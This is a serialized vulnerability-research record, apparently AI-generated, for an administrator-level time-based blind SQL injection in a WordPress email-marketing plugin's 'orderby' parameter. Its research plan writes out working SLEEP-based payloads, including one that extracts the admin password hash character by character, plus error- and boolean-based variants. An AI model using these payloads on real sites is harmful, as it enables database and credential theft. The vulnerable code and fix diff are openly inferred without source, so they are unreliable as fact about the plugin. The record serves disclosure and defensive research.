[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fkaH9m8OM6gm52Az0FzS5ypuHyYpMu9HNi8HdjtX7gV0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-7618","envalosimple-email-marketing-y-newsletters-authenticated-administrator-sql-injection-via-orderby-parameter","EnvíaloSimple: Email Marketing y Newsletters \u003C= 2.4.5 - Authenticated (Administrator+) SQL Injection via 'orderby' Parameter","The EnvíaloSimple: Email Marketing y Newsletters plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'orderby' parameter in all versions up to, and including, 2.4.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","envialosimple-email-marketing-y-newsletters-gratis",null,"\u003C=2.4.5","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-26 17:33:11","2026-06-02 10:56:33",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa7aa2246-aee9-4992-b030-97e78e3b7d22?source=api-prod",[],"researched",false,3,"This research plan outlines the steps required to identify and exploit the authenticated SQL Injection vulnerability (CVE-2026-7618) in the \"EnvíaloSimple: Email Marketing y Newsletters\" plugin.\n\n---\n\n### 1. Vulnerability Summary\nThe \"EnvíaloSimple: Email Marketing y Newsletters\" plugin (up to version 2.4.5) contains a time-based blind SQL Injection vulnerability via the `orderby` parameter. The vulnerability exists because the plugin directly concatenates user-supplied input from the `orderby` parameter into a raw SQL query without sufficient sanitization or using `$wpdb->prepare()`. Because `ORDER BY` clauses cannot be parameterized using standard placeholders in MySQL, developers must use strict whitelisting; the lack of this whitelist allows an attacker to append conditional logic (like `SLEEP()`) to the query.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** Likely an administrative dashboard page (e.g., `\u002Fwp-admin\u002Fadmin.php`) or an AJAX handler (`\u002Fwp-admin\u002Fadmin-ajax.php`).\n*   **Vulnerable Parameter:** `orderby`\n*   **Authentication Requirement:** Administrator level access.\n*   **Payload Type:** Time-based blind SQL Injection.\n*   **Preconditions:** The plugin must be active, and the attacker must be logged in as an administrator.\n\n### 3. Code Flow (Inferred)\nSince source files are not provided, the following trace is based on standard WordPress plugin patterns for `orderby` vulnerabilities:\n1.  **Entry Point:** An administrator accesses a plugin page that displays a list (e.g., subscribers, campaigns, or lists).\n2.  **Hook Registration:** The plugin likely uses `add_menu_page` or `add_submenu_page` to register a menu item. The callback function for this page is where the logic resides.\n3.  **Input Handling:** The callback function retrieves the sort order from `$_GET['orderby']`.\n4.  **Database Sink:** The `$orderby` variable is concatenated into an SQL string:\n    ```php\n    \u002F\u002F Hypothetical vulnerable code\n    $orderby = $_GET['orderby']; \n    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}envialosimple_subscribers ORDER BY $orderby ASC\");\n    ```\n5.  **Execution:** The `$wpdb->get_results()` function executes the malformed query.\n\n### 4. Nonce Acquisition Strategy\nIf the vulnerability is located on a standard WordPress admin list page (using `WP_List_Table`), a nonce might not be required for the `GET` request itself. However, if the vulnerability is inside an AJAX-based table reload:\n1.  **Identify the Page:** Navigate to the EnvíaloSimple menu in the admin dashboard.\n2.  **Grep for Localized Data:** Search the plugin source for `wp_localize_script`.\n3.  **Variable Identification:** Look for a script that enqueues an AJAX nonce (e.g., `window.envialosimple_obj?.nonce`).\n4.  **Extraction:**\n    *   Navigate to the specific plugin page using `browser_navigate`.\n    *   Use `browser_eval(\"window.envialosimple_vars?.nonce\")` (inferred variable name) to retrieve the token.\n\n### 5. Exploitation Strategy\nThe goal is to confirm the SQLi using a time-based payload.\n\n**Step 1: Locate the Vulnerable Page**\nSearch the plugin directory for the `orderby` parameter usage:\n```bash\ngrep -rn \"orderby\" . | grep -E \"\\$_GET|\\$_POST|\\$_REQUEST\"\n```\nAlso, find where the admin menu is registered:\n```bash\ngrep -rn \"add_menu_page\" .\n```\n\n**Step 2: Construct the Payload**\nSince the injection is in the `ORDER BY` clause, a payload using `CASE` or `IF` is most effective:\n` (CASE WHEN (1=1) THEN id ELSE SLEEP(5) END)`\n\n**Step 3: Send the HTTP Request**\nUse the `http_request` tool to perform the injection as an authenticated administrator.\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=[PAGE_SLUG]&orderby=(SELECT(6)FROM(SELECT(SLEEP(5)))a)`\n*   **Method:** `GET`\n*   **Headers:** Must include the Administrator's session cookies.\n\n**Payload for Data Extraction:**\nTo extract the admin's password hash:\n` (SELECT IF(ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36,SLEEP(5),1))`\n*(36 is the ASCII code for '$', which is the start of WP hashes).*\n\n### 4. Test Data Setup\n1.  **Plugin Installation:** Install and activate EnvíaloSimple \u003C= 2.4.5.\n2.  **User Creation:** Ensure an administrator user exists (default `admin` \u002F `password`).\n3.  **Data Generation:** Some tables might need at least one record for the `ORDER BY` to trigger effectively.\n    *   Create a dummy subscriber or email list via the plugin UI.\n\n### 5. Expected Results\n*   **Normal Request:** The page loads in standard time (e.g., \u003C 500ms).\n*   **Payload (False):** `orderby=(SELECT(6)FROM(SELECT(SLEEP(0)))a)` -> Page loads in standard time.\n*   **Payload (True):** `orderby=(SELECT(6)FROM(SELECT(SLEEP(5)))a)` -> Page response is delayed by exactly 5 seconds.\n\n### 6. Verification Steps\n1.  **Verify with WP-CLI:** After confirming the vulnerability via time-delay, check the database logs if possible, or use WP-CLI to see if the plugin created specific tables.\n    ```bash\n    wp db query \"SELECT * FROM wp_envialosimple_subscribers LIMIT 1\"\n    ```\n2.  **Exfiltration Verification:** Run a script that guesses the first character of the site's `DB_NAME` using the `SLEEP()` method and verify the result against the actual `wp-config.php`.\n\n### 7. Alternative Approaches\nIf the `ORDER BY` is wrapped in a way that prevents subqueries:\n*   **Error-Based SQLi:** Try triggering a division by zero if errors are visible:\n    `orderby=(SELECT IF(1=1,1,(SELECT 1\u002F0)))`\n*   **Boolean-Based (if sorting changes):**\n    1.  Observe the order of IDs with `orderby=id`.\n    2.  Inject `orderby=IF(1=1,id,email)`.\n    3.  If the sort order changes based on the condition, boolean-based extraction is possible.","The EnvíaloSimple: Email Marketing y Newsletters plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'orderby' parameter in versions up to 2.4.5. Authenticated administrators can exploit this to extract sensitive information from the database by injecting conditional SLEEP() commands into the ORDER BY clause of SQL queries.","\u002F\u002F Inferred from Research Plan - Hypothetical vulnerable code\n\u002F\u002F envialosimple-email-marketing-y-newsletters-gratis\u002Fadmin\u002Fsubscribers.php\n\n$orderby = $_GET['orderby']; \n$results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}envialosimple_subscribers ORDER BY $orderby ASC\");","--- a\u002Fenvialosimple-email-marketing-y-newsletters-gratis\u002Fadmin\u002Fsubscribers.php\n+++ b\u002Fenvialosimple-email-marketing-y-newsletters-gratis\u002Fadmin\u002Fsubscribers.php\n@@ -20,7 +20,10 @@\n- $orderby = $_GET['orderby'];\n+ $allowed_columns = array('id', 'name', 'email', 'created_at');\n+ $orderby = ( isset( $_GET['orderby'] ) && in_array( $_GET['orderby'], $allowed_columns ) ) ? $_GET['orderby'] : 'id';\n+ \n+ $order = ( isset( $_GET['order'] ) && strtoupper( $_GET['order'] ) === 'DESC' ) ? 'DESC' : 'ASC';\n \n- $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}envialosimple_subscribers ORDER BY $orderby ASC\");\n+ $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}envialosimple_subscribers ORDER BY $orderby $order\");","To exploit this vulnerability, an attacker must first authenticate as a user with Administrator privileges. By navigating to a plugin dashboard page that lists subscribers or campaigns, the attacker identifies a GET request using the 'orderby' parameter. The attacker then injects a time-based payload into this parameter, such as '(SELECT(1)FROM(SELECT(SLEEP(5)))a)'. If the server response is delayed by 5 seconds, the vulnerability is confirmed, and the attacker can proceed to exfiltrate database records character-by-character using conditional time delays.","gemini-3-flash-preview","2026-06-04 18:37:09","2026-06-04 18:37:30",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fenvialosimple-email-marketing-y-newsletters-gratis\u002Ftags"]